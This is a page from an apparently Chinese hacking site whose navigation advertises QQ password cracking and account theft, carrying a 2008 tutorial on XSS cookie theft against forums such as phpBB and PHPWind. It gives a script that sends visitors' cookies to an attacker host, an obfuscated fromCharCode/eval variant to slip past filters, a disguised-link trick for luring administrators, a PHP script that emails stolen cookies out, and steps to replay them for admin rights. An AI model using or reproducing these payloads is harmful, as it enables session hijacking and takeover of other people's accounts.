首 页论 坛破解QQ密码领免费QQ秀QQ等级修改盗取QQ教程QQ密码暴力破解QQ空间完整做法免费开所有QQ业务
设为首页
加入收藏
联系我们
您当前的位置:下载者 -> 网络技术 -> 文章内容
栏目导航
· QQ文章 · 综合文章
· 安全文章 · 新闻动态
· 实用技巧 · 入侵检测
· 木马病毒 · 电脑常识
· 编程设计 · 网络技术
相关文章

推荐:无法删除病毒不在烦恼 ..
推荐:国内资深黑客详谈网页木..
推荐:系统重装防再遭病毒侵袭..
推荐:黑客谈国内僵尸网络的现..
推荐:Windows系统安全模式下..
推荐:三大措施设置数据库安全..
推荐:揭开迅雷无种子也能BT下..
推荐:各种木马的隐藏技术全方..
推荐:安全设置策略及自带防火..
推荐:个人PC中毒后紧急处理措..
推荐:什么是社会工程学?剖析..
推荐:利用cain还原加密后的f..
推荐:时刻注意安全 养成安全..
推荐:系统自带不起眼但很强杀..
推荐:从零开始为您的电脑系统..
推荐:教你七个打造企业安全门..
推荐:网管员必知常识 常用电..
推荐:磁碟机病毒很猖獗 高手..
推荐:教您识别非法进程及手工..
推荐:SA权限下的思路变通

推荐:XSS攻击Cookie欺骗中隐藏JavaScript执行
发布时间:2008-3-5 12:28:37

来源:至尊宝的成长之路

比如发现一处可XSS地方:<script>alert(不管怎么样弹出就好)</script>

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱

<script>document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

怎么弄其实也不用我多说了。。

现在主要说的是如何隐藏JavaScript执行。

大家可能习惯每天去milw0rm.com看EXP,

每当发布XSS漏洞的EXP,当我们利用的时候。

却无法cookie任何信息,这是为什么呢。。

像魔力,PHPBB这样大型的论坛都具备XSS漏洞

我给的这个<script>document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

会显示Javascript 错误。

解决办法有2种,我们可以把外部敏感信息用unicode编码

给个URL:http://www.mikezilla.com/exp0012.html

通过编码就是这样:

<script>eval(location.href=String.fromCharCode( 104,116,116,112,58,47,47,119,119,119,46,119,52,99, 107,49,110,103,46,99,111,109));</script>

上述还不行就用第2种方法

Javascript fromCharCode中的eval功能

上面说了可以用unicode编码过一些站

比如编码后的104,116,116,112就是HTTP

如果论坛用了其他的编辑器,比如PHPWind 用的所见所得编辑器

直接打上http://url.com肯定会暴露。

那么我们就看编辑器的形式来调换URL

比如偷COOKIE的站是http://www.URL.com

我们就这样

{url=http://www.URL.COM}http://www.url.com&#123;/url}

当然显示的部分你可以替换成吸引人的信息骗取管理和斑竹的点击

用一点社会工程学就可以了。。

好了现在都完成了初步的设想,开始实现吧

第1步:管理看见我们构造好的陷阱,并且点了他

第2步:Javascript 执行成功了。。。

第3步:构造好的偷COOKIE文件偷取到Cookie

第4步:我们不可能傻到URL连接是纯文本,将URL用Unicode编码(这里习惯说是加密)http://www.mikezilla.com/exp0012.html

第5步:截取的Cookie信息当然不是明文的,我们只要使用FireFox Cookie 编辑器
替换COOKIE就OK了,或者用CookieEditor等其他工具。。

个人建议:偷取Cookie不一定就使用空间收取Cookie信息
比如构造个邮箱收取就这样

<?

mail("hackeroo@hotmail.com","cookie monster",$_REQUEST['cookie']);

?>
<html>
<script>document.location='http://www.URL.com/'<;/script>
</html>

好了偷到有价值的信息替换Cookie就行了。。替换斑竹的就是斑竹权限,替换管理的就和是管理权限。。

完了。。。。

[] [打 印] [收 藏]
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 联系站长
如果您对本站有任何建议或意见,请联系站长,感谢您对本站一如既往的支持!
Powered by:NewAsp SiteManageSystem Version 2.1 SP1 1030